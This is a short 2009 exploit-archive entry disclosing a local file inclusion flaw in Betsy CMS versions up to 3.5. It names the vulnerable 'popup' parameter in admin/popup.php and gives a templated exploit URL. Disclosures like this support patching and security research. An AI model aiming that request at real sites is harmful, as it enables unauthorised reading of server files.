[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Betsy CMS versions <= 3.5 Local File Inclusion Vulnerability
# Published : 2009-11-21
# Author : MizoZ
# Previous Title : PHP MultiPart Form-Data Denial of Service PoC
# Next Title : Vivid Ads Shopping Cart (prodid) Remote SQL Injection


/*

Author          : MizoZ [from MA]
Group           : EvilWay
Email           : mizozx[at]gmail[dot]com

Greetz          : Zuka !!

Good luck DZ :)

*/

The vulnerability is in the file admin/popup.php on the get $_GET['popup']

Exploit :

[HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]